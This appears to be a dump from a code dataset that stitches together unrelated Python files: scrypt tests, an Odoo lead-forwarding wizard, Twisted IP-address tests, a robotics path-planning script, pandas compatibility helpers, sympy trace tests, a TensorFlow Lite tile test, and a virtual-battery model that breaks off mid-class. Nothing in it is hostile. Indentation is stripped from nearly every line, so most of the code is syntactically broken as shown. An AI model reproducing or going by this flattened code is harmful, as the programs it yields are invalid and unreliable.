key1, key2 = scrypt(b("password"), b("salt"), 6, 16, 1, 1, 2)
self.assertEqual((ref[:6], ref[6:]), (key1, key2))
# Same output, but this time split over 3 keys
key1, key2, key3 = scrypt(b("password"), b("salt"), 4, 16, 1, 1, 3)
self.assertEqual((ref[:4], ref[4:8], ref[8:]), (key1, key2, key3))
def get_tests(config={}):
tests = []
tests += list_test_cases(PBKDF1_Tests)
tests += list_test_cases(PBKDF2_Tests)
tests += list_test_cases(S2V_Tests)
tests += list_test_cases(HKDF_Tests)
tests += list_test_cases(scrypt_Tests)
return tests
if __name__ == '__main__':
suite = lambda: unittest.TestSuite(get_tests())
unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4
| gpl-2.0 |
dllsf/odootest | addons/crm_partner_assign/wizard/crm_forward_to_partner.py | 377 | 10606 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class crm_lead_forward_to_partner(osv.TransientModel):
""" Forward info history to partners. """
_name = 'crm.lead.forward.to.partner'
def _convert_to_assignation_line(self, cr, uid, lead, partner, context=None):
lead_location = []
partner_location = []
if lead.country_id:
lead_location.append(lead.country_id.name)
if lead.city:
lead_location.append(lead.city)
if partner:
if partner.country_id:
partner_location.append(partner.country_id.name)
if partner.city:
partner_location.append(partner.city)
return {'lead_id': lead.id,
'lead_location': ", ".join(lead_location),
'partner_assigned_id': partner and partner.id or False,
'partner_location': ", ".join(partner_location),
'lead_link': self.get_lead_portal_url(cr, uid, lead.id, lead.type, context=context),
}
def default_get(self, cr, uid, fields, context=None):
if context is None:
context = {}
lead_obj = self.pool.get('crm.lead')
email_template_obj = self.pool.get('email.template')
try:
template_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'crm_partner_assign', 'email_template_lead_forward_mail')[1]
except ValueError:
template_id = False
res = super(crm_lead_forward_to_partner, self).default_get(cr, uid, fields, context=context)
active_ids = context.get('active_ids')
default_composition_mode = context.get('default_composition_mode')
res['assignation_lines'] = []
if template_id:
res['body'] = email_template_obj.get_email_template(cr, uid, template_id).body_html
if active_ids:
lead_ids = lead_obj.browse(cr, uid, active_ids, context=context)
if default_composition_mode == 'mass_mail':
partner_assigned_ids = lead_obj.search_geo_partner(cr, uid, active_ids, context=context)
else:
partner_assigned_ids = dict((lead.id, lead.partner_assigned_id and lead.partner_assigned_id.id or False) for lead in lead_ids)
res['partner_id'] = lead_ids[0].partner_assigned_id.id
for lead in lead_ids:
partner_id = partner_assigned_ids.get(lead.id) or False
partner = False
if partner_id:
partner = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context)
res['assignation_lines'].append(self._convert_to_assignation_line(cr, uid, lead, partner))
return res
def action_forward(self, cr, uid, ids, context=None):
lead_obj = self.pool.get('crm.lead')
record = self.browse(cr, uid, ids[0], context=context)
email_template_obj = self.pool.get('email.template')
try:
template_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'crm_partner_assign', 'email_template_lead_forward_mail')[1]
except ValueError:
raise osv.except_osv(_('Email Template Error'),
_('The Forward Email Template is not in the database'))
try:
portal_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'base', 'group_portal')[1]
except ValueError:
raise osv.except_osv(_('Portal Group Error'),
_('The Portal group cannot be found'))
local_context = context.copy()
if not (record.forward_type == 'single'):
no_email = set()
for lead in record.assignation_lines:
if lead.partner_assigned_id and not lead.partner_assigned_id.email:
no_email.add(lead.partner_assigned_id.name)
if no_email:
raise osv.except_osv(_('Email Error'),
                    _('Set an email address for the partner(s): %s') % ", ".join(no_email))
if record.forward_type == 'single' and not record.partner_id.email:
raise osv.except_osv(_('Email Error'),
                _('Set an email address for the partner %s') % record.partner_id.name)
partners_leads = {}
for lead in record.assignation_lines:
partner = record.forward_type == 'single' and record.partner_id or lead.partner_assigned_id
lead_details = {
'lead_link': lead.lead_link,
'lead_id': lead.lead_id,
}
if partner:
partner_leads = partners_leads.get(partner.id)
if partner_leads:
partner_leads['leads'].append(lead_details)
else:
partners_leads[partner.id] = {'partner': partner, 'leads': [lead_details]}
stage_id = False
if record.assignation_lines and record.assignation_lines[0].lead_id.type == 'lead':
try:
stage_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'crm_partner_assign', 'stage_portal_lead_assigned')[1]
except ValueError:
pass
for partner_id, partner_leads in partners_leads.items():
in_portal = False
            partner = partner_leads['partner']  # use this iteration's partner, not the stale `partner` left over from the loop above
            for contact in (partner.child_ids or [partner]):
if contact.user_ids:
in_portal = portal_id in [g.id for g in contact.user_ids[0].groups_id]
local_context['partner_id'] = partner_leads['partner']
local_context['partner_leads'] = partner_leads['leads']
local_context['partner_in_portal'] = in_portal
email_template_obj.send_mail(cr, uid, template_id, ids[0], context=local_context)
lead_ids = [lead['lead_id'].id for lead in partner_leads['leads']]
values = {'partner_assigned_id': partner_id, 'user_id': partner_leads['partner'].user_id.id}
if stage_id:
values['stage_id'] = stage_id
if partner_leads['partner'].user_id:
values['section_id'] = partner_leads['partner'].user_id.default_section_id.id
lead_obj.write(cr, uid, lead_ids, values)
self.pool.get('crm.lead').message_subscribe(cr, uid, lead_ids, [partner_id], context=context)
return True
def get_lead_portal_url(self, cr, uid, lead_id, type, context=None):
action = type == 'opportunity' and 'action_portal_opportunities' or 'action_portal_leads'
try:
action_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'crm_partner_assign', action)[1]
except ValueError:
action_id = False
portal_link = "%s/?db=%s#id=%s&action=%s&view_type=form" % (self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url'), cr.dbname, lead_id, action_id)
return portal_link
def get_portal_url(self, cr, uid, ids, context=None):
portal_link = "%s/?db=%s" % (self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url'), cr.dbname)
return portal_link
_columns = {
'forward_type': fields.selection([('single', 'a single partner: manual selection of partner'), ('assigned', "several partners: automatic assignation, using GPS coordinates and partner's grades"), ], 'Forward selected leads to'),
'partner_id': fields.many2one('res.partner', 'Forward Leads To'),
'assignation_lines': fields.one2many('crm.lead.assignation', 'forward_id', 'Partner Assignation'),
'body': fields.html('Contents', help='Automatically sanitized HTML contents'),
}
_defaults = {
'forward_type': lambda self, cr, uid, c: c.get('forward_type') or 'single',
}
class crm_lead_assignation (osv.TransientModel):
_name = 'crm.lead.assignation'
_columns = {
'forward_id': fields.many2one('crm.lead.forward.to.partner', 'Partner Assignation'),
'lead_id': fields.many2one('crm.lead', 'Lead'),
'lead_location': fields.char('Lead Location', size=128),
'partner_assigned_id': fields.many2one('res.partner', 'Assigned Partner'),
'partner_location': fields.char('Partner Location', size=128),
'lead_link': fields.char('Lead Single Links', size=128),
}
def on_change_lead_id(self, cr, uid, ids, lead_id, context=None):
if not context:
context = {}
if not lead_id:
return {'value': {'lead_location': False}}
lead = self.pool.get('crm.lead').browse(cr, uid, lead_id, context=context)
lead_location = []
if lead.country_id:
lead_location.append(lead.country_id.name)
if lead.city:
lead_location.append(lead.city)
return {'value': {'lead_location': ", ".join(lead_location)}}
def on_change_partner_assigned_id(self, cr, uid, ids, partner_assigned_id, context=None):
if not context:
context = {}
if not partner_assigned_id:
return {'value': {'lead_location': False}}
partner = self.pool.get('res.partner').browse(cr, uid, partner_assigned_id, context=context)
partner_location = []
if partner.country_id:
partner_location.append(partner.country_id.name)
if partner.city:
partner_location.append(partner.city)
return {'value': {'partner_location': ", ".join(partner_location)}}
# # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
rockyzhang/zhangyanhit-python-for-android-mips | python-modules/twisted/twisted/test/test_abstract.py | 61 | 2546 | # Copyright (c) 2007 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for generic file descriptor based reactor support code.
"""
from twisted.trial.unittest import TestCase
from twisted.internet.abstract import isIPAddress
class AddressTests(TestCase):
"""
Tests for address-related functionality.
"""
def test_decimalDotted(self):
"""
L{isIPAddress} should return C{True} for any decimal dotted
representation of an IPv4 address.
"""
self.assertTrue(isIPAddress('0.1.2.3'))
self.assertTrue(isIPAddress('252.253.254.255'))
def test_shortDecimalDotted(self):
"""
L{isIPAddress} should return C{False} for a dotted decimal
representation with fewer or more than four octets.
"""
self.assertFalse(isIPAddress('0'))
self.assertFalse(isIPAddress('0.1'))
self.assertFalse(isIPAddress('0.1.2'))
self.assertFalse(isIPAddress('0.1.2.3.4'))
def test_invalidLetters(self):
"""
L{isIPAddress} should return C{False} for any non-decimal dotted
representation including letters.
"""
self.assertFalse(isIPAddress('a.2.3.4'))
self.assertFalse(isIPAddress('1.b.3.4'))
def test_invalidPunctuation(self):
"""
L{isIPAddress} should return C{False} for a string containing
strange punctuation.
"""
self.assertFalse(isIPAddress(','))
self.assertFalse(isIPAddress('1,2'))
self.assertFalse(isIPAddress('1,2,3'))
self.assertFalse(isIPAddress('1.,.3,4'))
def test_emptyString(self):
"""
L{isIPAddress} should return C{False} for the empty string.
"""
self.assertFalse(isIPAddress(''))
def test_invalidNegative(self):
"""
L{isIPAddress} should return C{False} for negative decimal values.
"""
self.assertFalse(isIPAddress('-1'))
self.assertFalse(isIPAddress('1.-2'))
self.assertFalse(isIPAddress('1.2.-3'))
self.assertFalse(isIPAddress('1.2.-3.4'))
def test_invalidPositive(self):
"""
L{isIPAddress} should return C{False} for a string containing
positive decimal values greater than 255.
"""
self.assertFalse(isIPAddress('256.0.0.0'))
self.assertFalse(isIPAddress('0.256.0.0'))
self.assertFalse(isIPAddress('0.0.256.0'))
self.assertFalse(isIPAddress('0.0.0.256'))
self.assertFalse(isIPAddress('256.256.256.256'))
| apache-2.0 |
mylene-campana/hpp-rbprm-corba | script/tests/hrp2_city1_path.py | 1 | 9565 | #/usr/bin/env python
# author: Mylene Campana ([email protected])
# Script which goes with hpp-rbprm-corba package.
# The script launches a skeleton-robot and a groundcrouch environment.
# It defines init and final configs, and solves them with RBPRM.
# Range Of Motions are spheres linked to the 4 end-effectors
#blender/urdf_to_blender.py -p rbprmBuilder/ -i /local/mcampana/devel/hpp/src/animals_description/urdf/skeleton.urdf -o skeleton_blend.py
from hpp.corbaserver import Client
from hpp.corbaserver.rbprm.problem_solver import ProblemSolver
from hpp.corbaserver.rbprm.rbprmbuilder import Builder
from hpp.gepetto import Viewer, PathPlayer
import math
from viewer_library import *
rootJointType = 'freeflyer'
packageName = 'hpp-rbprm-corba'
meshPackageName = 'hpp-rbprm-corba'
urdfName = 'hrp2_trunk_flexible'
urdfNameRoms = ['hrp2_lleg_rom','hrp2_rleg_rom']
urdfSuffix = ""
srdfSuffix = ""
ecsSize = 4
rbprmBuilder = Builder () # RBPRM
rbprmBuilder.loadModel(urdfName, urdfNameRoms, rootJointType, meshPackageName, packageName, urdfSuffix, srdfSuffix)
#rbprmBuilder.setJointBounds ("base_joint_xyz", [-140, 120, -80, 65, 1, 170])
rbprmBuilder.setJointBounds ("base_joint_xyz", [-140, 120, -80, 65, 10, 170])
rbprmBuilder.boundSO3([-0.2,0.2,-3.14,3.14,-0.3,0.3])
rbprmBuilder.setContactSize (0.03,0.08)
rbprmBuilder.client.basic.robot.setDimensionExtraConfigSpace(ecsSize)
rbprmBuilder.client.basic.robot.setExtraConfigSpaceBounds([0,0,0,0,0,0,-3.14,3.14])
ps = ProblemSolver (rbprmBuilder)
ps.client.problem.selectPathValidation("RbprmPathValidation",0.05) # also configValidation
ps.selectPathPlanner("BallisticPlanner") # "PRMplanner"
#rbprmBuilder.setFullOrientationMode(True) # RB-shooter follow obstacle-normal orientation
rbprmBuilder.setFrictionCoef(1.2)
rbprmBuilder.setMaxTakeoffVelocity(30)#(8)
rbprmBuilder.setMaxLandingVelocity(30)
ps.client.problem.selectConFigurationShooter("RbprmShooter")
ps.client.problem.selectSteeringMethod("SteeringParabola")
rbprmBuilder.setNumberFilterMatch(0)
r = Viewer (ps); gui = r.client.gui
r(rbprmBuilder.getCurrentConfig ())
pp = PathPlayer (rbprmBuilder.client.basic, r)
r.loadObstacleModel ("iai_maps", "buildings_reduced", "buildings_reduced")
addLight (r, [-3,0,8,1,0,0,0], "li");
# Configs : [x, y, z, q1, q2, q3, q4, dir.x, dir.y, dir.z, theta]
q11 = rbprmBuilder.getCurrentConfig ()
q11[(len(q11)-4):]=[0,0,1,0] # set normal for init / goal config
# q11[0:7] = [16,45,100, 1, 0, 0, 0]; r(q11) # X-shaped roof
#q11[0:7] = [0,27,72.3, 1, 0, 0, 0]; r(q11) # first roof of big tower
#q11[0:7] = [-100,45,0.4, 1, 0, 0, 0]; r(q11) # on floor
#q11[0:7] = [-105,20,29.4, 1, 0, 0, 0]; r(q11) # roof of house
#q11[0:7] = [55,60,0.3, 1, 0, 0, 0]; r(q11) # floor, right side
q11[0:7] = [-11.8,38.2,120.9, 1, 0, 0, 0]; r(q11) # highest tower
rbprmBuilder.isConfigValid(q11)
q22 = q11[::]
#q22[0:7] = [55,60,0.3, 1, 0, 0, 0]; r(q22) # floor, right side
#q22[0:7] = [-11.6,38.5,120.8, 1, 0, 0, 0]; r(q22) # highest tower
q22[0:7] = [16,45,100.5, 1, 0, 0, 0]; r(q22) # X-shaped roof
#q22[0:7] = [-110,20,29.2, 1, 0, 0, 0]; r(q22) #house on left side
#q22[0:7] = [90,40,20.5, 1, 0, 0, 0]; r(q22) #right house
rbprmBuilder.isConfigValid(q22)
ps.clearRoadmap();
ps.setInitialConfig (q11); ps.addGoalConfig (q22)
#r.solveAndDisplay("rm",1,1)
## manually add waypoints (faster computation for tests; works without them, but it's slow (~1 minute))
"""
waypoints = [[20.075492263329966,
45.67270834760806,
100.0368335278786,
1,
0,
0,
0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0] ,
[4,
24,
72.36757488910698,
0.6025437481958323,
-0.014994289380592305,
0.36339178566529046,
-0.7103960957853586,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0],
[17.90089886471105,
20.51569231026736,
37.4,
0.9780744240181991,
-0.009709317338437355,
0.023538837001709934,
0.20669318660975794,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0,
0.0]]
pbCl = rbprmBuilder.client.basic.problem
pbCl.addConfigToRoadmap (waypoints[0])
pbCl.addConfigToRoadmap (waypoints[1])
pbCl.addConfigToRoadmap (waypoints[2])
ps.directPath (q11, waypoints[0],True); pathIds0 = ps.numberPaths () - 1
ps.directPath (waypoints[0], waypoints[1],True); pathId01 = ps.numberPaths () - 1
ps.directPath (waypoints[1], waypoints[2],True); pathId12 = ps.numberPaths () - 1
ps.directPath (waypoints[2], q22,True); pathId2g = ps.numberPaths () - 1
pbCl.addEdgeToRoadmap (q11, waypoints[0], pathIds0, True)
pbCl.addEdgeToRoadmap (waypoints[0], waypoints[1], pathId01, True)
pbCl.addEdgeToRoadmap (waypoints[1], waypoints[2], pathId12, True)
pbCl.addEdgeToRoadmap (waypoints[2], q22, pathId2g, True)
##########
"""
t = ps.solve ()
solutionPathId = ps.numberPaths () - 1
pp.displayPath(solutionPathId, [0.0, 0.0, 0.8, 1.0])
rbprmBuilder.rotateAlongPath (solutionPathId,True)
orientedpathId = ps.numberPaths () - 1
#pp(orientedpathId)
r(pp.client.problem.configAtParam(orientedpathId,0))
V0list = rbprmBuilder.getsubPathsV0Vimp("V0",solutionPathId)
Vimplist = rbprmBuilder.getsubPathsV0Vimp("Vimp",solutionPathId)
print("Verify that all RB-waypoints are valid: ")
pathWaypoints = ps.getWaypoints(solutionPathId)
for i in range(1,len(pathWaypoints)-1):
if(not(rbprmBuilder.isConfigValid(pathWaypoints[i])[0])):
        print('problem with waypoint number: ' + str(i))
#plotConeWaypoints (rbprmBuilder, solutionPathId, r, "cone_wp_group", "friction_cone_WP2")
#plotCone (q11, rbprmBuilder, r, "cone_11", "friction_cone2"); plotCone (q22, rbprmBuilder, r, "cone_21", "friction_cone2")
rob = rbprmBuilder.client.basic.robot
r(q11)
# Move RB-robot away in viewer
qAway = q11 [::]; qAway[2] = -5;
rbprmBuilder.setCurrentConfig (qAway); r(qAway)
## DEBUG tools ##
"""
cl.obstacle.getObstaclePosition('decor_base')
rbprmBuilder.isConfigValid(q1)
rbprmBuilder.setCurrentConfig(q1)
res=rbprmBuilder.distancesToCollision()
r( ps.configAtParam(0,5) )
ps.optimizePath (0)
ps.clearRoadmap ()
ps.resetGoalConfigs ()
from numpy import *
argmin(rbprmBuilder.distancesToCollision()[0])
rbprmBuilder.getJointNames ()
rbprmBuilder.getConfigSize ()
rbprmBuilder.client.rbprm.rbprm.isRbprmValid (q22)
r.client.gui.getNodeList()
rbprmBuilder.client.rbprm.rbprm.setRbShooter ()
q = rbprmBuilder.client.rbprm.rbprm.rbShoot ()
r(q)
rbprmBuilder.client.rbprm.rbprm.isRbprmValid (q)
rbprmBuilder.client.rbprm.rbprm.setRbShooter ()
r(rbprmBuilder.client.rbprm.rbprm.rbShoot ())
ps.client.problem.getResultValues ()
"""
## 3D viewer tools ##
"""
plotFrame (r, 'frame_group', [0,0,0], 0.6)
gui.removeFromGroup("path0",r.sceneName)
gui.getNodeList()
ps.numberNodes()
pathSamples = plotSampleSubPath (cl, r, pathId, 70, "path0", [0,0,1,1])
plotCone (q1, cl, r, "cone_first", "friction_cone_SG2"); plotCone (q2, cl, r, "cone_second", "friction_cone_SG2")
plotConeWaypoints (cl, pathId, r, "cone_wp_group", "friction_cone_WP2")
# Plot cones and edges in viewer
plotConesRoadmap (cl, r, 'cone_rm_group', "friction_cone2")
plotEdgesRoadmap (cl, r, 'edgeGroup', 70, [0,1,0.2,1])
gui = r.client.gui
gui.setCaptureTransform ("frames.yaml ", ["skeleton_trunk_flexible"])
q = q11
r (q); cl.rbprmBuilder.setCurrentConfig(q)
gui.refresh (); gui.captureTransform ()
gui.setVisibility('skeleton_trunk_flexible/thorax_rhand_rom',"OFF")
q = q_goal_test [0:7]
q[0] = q[0] + 1; q[2] = q[2] + 1
gui.addLight ("li", r.windowId, 0.0001, [0.9,0.9,0.9,1])
gui.addToGroup ("li", r.sceneName)
gui.applyConfiguration ("li", q)
gui.refresh ()
"""
## Export path to BLENDER ##
"""
import numpy as np
pathId = 0; dt = 0.05; gui.setCaptureTransform ("skeleton_trunk_path.yaml", ["skeleton_trunk_flexible"])
PL = ps.pathLength(pathId)
FrameRange = np.arange(0,PL,dt)
numberFrame = len(FrameRange)
# test frame capture
q = q11; r (q); gui.refresh (); gui.captureTransform ()
q = q22; r (q); gui.refresh (); gui.captureTransform ()
# capture path
for t in FrameRange:
q = ps.configAtParam (pathId, t)#update robot configuration
r (q); gui.refresh (); gui.captureTransform ()
r (q22); gui.refresh (); gui.captureTransform ()
"""
""" # Manually add waypoints to roadmap:
pbCl = rbprmBuilder.client.basic.problem
pbCl.addConfigToRoadmap (waypoints[0])
pbCl.addConfigToRoadmap (waypoints[1])
pbCl.addConfigToRoadmap (waypoints[2])
ps.directPath (q11, waypoints[0]); pathIds0 = ps.numberPaths () - 1
ps.directPath (waypoints[0], waypoints[1]); pathId01 = ps.numberPaths () - 1
ps.directPath (waypoints[1], waypoints[2]); pathId12 = ps.numberPaths () - 1
ps.directPath (waypoints[2], q22); pathId2g = ps.numberPaths () - 1
pbCl.addEdgeToRoadmap (q11, waypoints[0], pathIds0, True)
pbCl.addEdgeToRoadmap (waypoints[0], waypoints[1], pathId01, True)
pbCl.addEdgeToRoadmap (waypoints[1], waypoints[2], pathId12, True)
pbCl.addEdgeToRoadmap (waypoints[2], q22, pathId2g, True)
pbCl.saveRoadmap ('/local/mcampana/devel/hpp/data/skeleton_test_path.rdm')
ps.readRoadmap ('/local/mcampana/devel/hpp/data/skeleton_test_path.rdm')
"""
""" #### display
id = r.client.gui.getWindowID("window_hpp_")
r.client.gui.attachCameraToNode("spiderman_trunk/base_link",id)
ps.clearRoadmap()
gui.removeFromGroup("path_1_root",r.sceneName)
ps.solve()
solutionPathId = ps.numberPaths () - 1
pp.displayPath(solutionPathId, [0.0, 0.0, 0.8, 1.0])
rbprmBuilder.rotateAlongPath (solutionPathId)
orientedpathId = ps.numberPaths () - 1
r(pp.client.problem.configAtParam(orientedpathId,0))
pp(orientedpathId)
q11 = ps.node(0)
q22 = ps.node(1)
plotCone (q11, ps, r, "cone_first", "friction_cone_SG2");
plotCone (q22, ps, r, "cone_second", "friction_cone_SG2")
"""
| lgpl-3.0 |
Weihonghao/ECM | Vpy34/lib/python3.5/site-packages/pandas/compat/numpy/__init__.py | 3 | 2213 | """ support numpy compatibility across versions """
import re
import numpy as np
from distutils.version import LooseVersion
from pandas.compat import string_types, string_and_binary_types
# numpy versioning
_np_version = np.__version__
_nlv = LooseVersion(_np_version)
_np_version_under1p8 = _nlv < '1.8'
_np_version_under1p9 = _nlv < '1.9'
_np_version_under1p10 = _nlv < '1.10'
_np_version_under1p11 = _nlv < '1.11'
_np_version_under1p12 = _nlv < '1.12'
_np_version_under1p13 = _nlv < '1.13'
if _nlv < '1.7.0':
raise ImportError('this version of pandas is incompatible with '
'numpy < 1.7.0\n'
'your numpy version is {0}.\n'
'Please upgrade numpy to >= 1.7.0 to use '
'this pandas version'.format(_np_version))
_tz_regex = re.compile('[+-]0000$')
def tz_replacer(s):
if isinstance(s, string_types):
if s.endswith('Z'):
s = s[:-1]
elif _tz_regex.search(s):
s = s[:-5]
return s
def np_datetime64_compat(s, *args, **kwargs):
"""
provide compat for construction of strings to numpy datetime64's with
tz-changes in 1.11 that make '2015-01-01 09:00:00Z' show a deprecation
warning, when need to pass '2015-01-01 09:00:00'
"""
if not _np_version_under1p11:
s = tz_replacer(s)
return np.datetime64(s, *args, **kwargs)
def np_array_datetime64_compat(arr, *args, **kwargs):
"""
provide compat for construction of an array of strings to a
np.array(..., dtype=np.datetime64(..))
tz-changes in 1.11 that make '2015-01-01 09:00:00Z' show a deprecation
warning, when need to pass '2015-01-01 09:00:00'
"""
if not _np_version_under1p11:
# is_list_like
if hasattr(arr, '__iter__') and not \
isinstance(arr, string_and_binary_types):
arr = [tz_replacer(s) for s in arr]
else:
arr = tz_replacer(arr)
return np.array(arr, *args, **kwargs)
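# Illustrative usage (a sketch added for clarity, not part of the original
# module): on numpy >= 1.11 both helpers strip a trailing "Z" or "+0000"/"-0000"
# suffix before construction, avoiding the tz-aware DeprecationWarning:
#
#   np_datetime64_compat('2015-01-01 09:00:00Z')
#   np_array_datetime64_compat(['2015-01-01 09:00:00Z'], dtype='datetime64[ns]')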
__all__ = ['np',
'_np_version_under1p8',
'_np_version_under1p9',
'_np_version_under1p10',
'_np_version_under1p11',
'_np_version_under1p12',
]
| agpl-3.0 |
bukzor/sympy | sympy/matrices/expressions/tests/test_trace.py | 83 | 2693 | from sympy.core import Lambda, S, symbols
from sympy.concrete import Sum
from sympy.functions import adjoint, conjugate, transpose
from sympy.matrices import eye, Matrix, ShapeError, ImmutableMatrix
from sympy.matrices.expressions import (
Adjoint, Identity, FunctionMatrix, MatrixExpr, MatrixSymbol, Trace,
ZeroMatrix, trace, MatPow, MatAdd, MatMul
)
from sympy.utilities.pytest import raises, XFAIL
n = symbols('n', integer=True)
A = MatrixSymbol('A', n, n)
B = MatrixSymbol('B', n, n)
C = MatrixSymbol('C', 3, 4)
def test_Trace():
assert isinstance(Trace(A), Trace)
assert not isinstance(Trace(A), MatrixExpr)
raises(ShapeError, lambda: Trace(C))
assert trace(eye(3)) == 3
assert trace(Matrix(3, 3, [1, 2, 3, 4, 5, 6, 7, 8, 9])) == 15
assert adjoint(Trace(A)) == trace(Adjoint(A))
assert conjugate(Trace(A)) == trace(Adjoint(A))
assert transpose(Trace(A)) == Trace(A)
A / Trace(A) # Make sure this is possible
# Some easy simplifications
assert trace(Identity(5)) == 5
assert trace(ZeroMatrix(5, 5)) == 0
assert trace(2*A*B) == 2*Trace(A*B)
assert trace(A.T) == trace(A)
i, j = symbols('i j')
F = FunctionMatrix(3, 3, Lambda((i, j), i + j))
assert trace(F) == (0 + 0) + (1 + 1) + (2 + 2)
raises(TypeError, lambda: Trace(S.One))
assert Trace(A).arg is A
assert str(trace(A)) == str(Trace(A).doit())
def test_Trace_A_plus_B():
assert trace(A + B) == Trace(A) + Trace(B)
assert Trace(A + B).arg == MatAdd(A, B)
assert Trace(A + B).doit() == Trace(A) + Trace(B)
def test_Trace_MatAdd_doit():
# See issue #9028
X = ImmutableMatrix([[1, 2, 3]]*3)
Y = MatrixSymbol('Y', 3, 3)
q = MatAdd(X, 2*X, Y, -3*Y)
assert Trace(q).arg == q
assert Trace(q).doit() == 18 - 2*Trace(Y)
def test_Trace_MatPow_doit():
X = Matrix([[1, 2], [3, 4]])
assert Trace(X).doit() == 5
q = MatPow(X, 2)
assert Trace(q).arg == q
assert Trace(q).doit() == 29
def test_Trace_MutableMatrix_plus():
# See issue #9043
X = Matrix([[1, 2], [3, 4]])
assert Trace(X) + Trace(X) == 2*Trace(X)
def test_Trace_doit_deep_False():
X = Matrix([[1, 2], [3, 4]])
q = MatPow(X, 2)
assert Trace(q).doit(deep=False).arg == q
q = MatAdd(X, 2*X)
assert Trace(q).doit(deep=False).arg == q
q = MatMul(X, 2*X)
assert Trace(q).doit(deep=False).arg == q
def test_trace_constant_factor():
# Issue 9052: gave 2*Trace(MatMul(A)) instead of 2*Trace(A)
assert trace(2*A) == 2*Trace(A)
X = ImmutableMatrix([[1, 2], [3, 4]])
assert trace(MatMul(2, X)) == 10
@XFAIL
def test_rewrite():
assert isinstance(trace(A).rewrite(Sum), Sum)
| bsd-3-clause |
adit-chandra/tensorflow | tensorflow/lite/testing/op_tests/tile.py | 4 | 2453 | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test configs for tile."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
@register_make_test_function()
def make_tile_tests(options):
"""Make a set of tests to do tile."""
test_parameters = [{
"input_dtype": [tf.float32, tf.int32, tf.bool],
"input_shape": [[3, 2, 1], [2, 2, 2]],
"multiplier_dtype": [tf.int32, tf.int64],
"multiplier_shape": [[3]]
}]
def build_graph(parameters):
"""Build the tile op testing graph."""
input_value = tf.compat.v1.placeholder(
dtype=parameters["input_dtype"],
shape=parameters["input_shape"],
name="input")
multiplier_value = tf.compat.v1.placeholder(
dtype=parameters["multiplier_dtype"],
shape=parameters["multiplier_shape"],
name="multiplier")
out = tf.tile(input_value, multiplier_value)
return [input_value, multiplier_value], [out]
def build_inputs(parameters, sess, inputs, outputs):
input_value = create_tensor_data(parameters["input_dtype"],
parameters["input_shape"])
multipliers_value = create_tensor_data(
parameters["multiplier_dtype"],
parameters["multiplier_shape"],
min_value=0)
return [input_value, multipliers_value], sess.run(
outputs,
feed_dict={
inputs[0]: input_value,
inputs[1]: multipliers_value
})
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
| apache-2.0 |
dpinney/omf | omf/solvers/VB.py | 1 | 29740 | import pandas as pd
import pulp
import numpy as np
from numpy import *
import math  # used by run_fhec/run_okec below (math.exp); missing from the original import block
class VirtualBattery(object):
""" Base class for abstraction. """
def __init__(self, ambient_temp, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number):
# C :thermal capacitance
# R : thermal resistance
# P: rated power (kW) of each TCL
# eta: COP
# delta: temperature deadband
# theta_s: temperature setpoint
# N: number of TCL
# ambient: ambient temperature
self.ambient = ambient_temp
self.C = capacitance
self.R = resistance
self.P = rated_power
self.eta = COP
self.delta = deadband
self.theta_s = setpoint
self.N = tcl_number
def generate(self, participation_number, P0_number):
""" Main calculation happens here. """
#heuristic function of participation
atan = np.arctan
participation = participation_number
P0 = P0_number
P0[P0 < 0] = 0.0 # set negative power consumption to 0
p_lower = self.N*participation*P0 # aggregated baseline power consumption considering participation
p_upper = self.N*participation*(self.P - P0)
p_upper[p_upper < 0] = 0.0 # set negative power upper bound to 0
e_ul = self.N*participation*self.C*self.delta/2/self.eta
return p_lower, p_upper, e_ul
class AC(VirtualBattery):
""" Derived Class for specifically AC Virtual Battery. """
def __init__(self, theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number):
super(AC, self).__init__(theta_a, capacitance, resistance, rated_power, COP, deadband, setpoint, tcl_number)
# self.tcl_idx = tcl_idx
self.theta_a = self.ambient # theta_a == ambient temperature
def generate(self):
#heuristic function of participation
atan = np.arctan
# participation for AC
Ta = np.linspace(20, 45, num=51)
participation = (atan(self.theta_a-27) - atan(Ta[0]-27))/((atan(Ta[-1]-27) - atan(Ta[0]-27)))
participation = np.clip(participation, 0, 1)
#P0 for AC
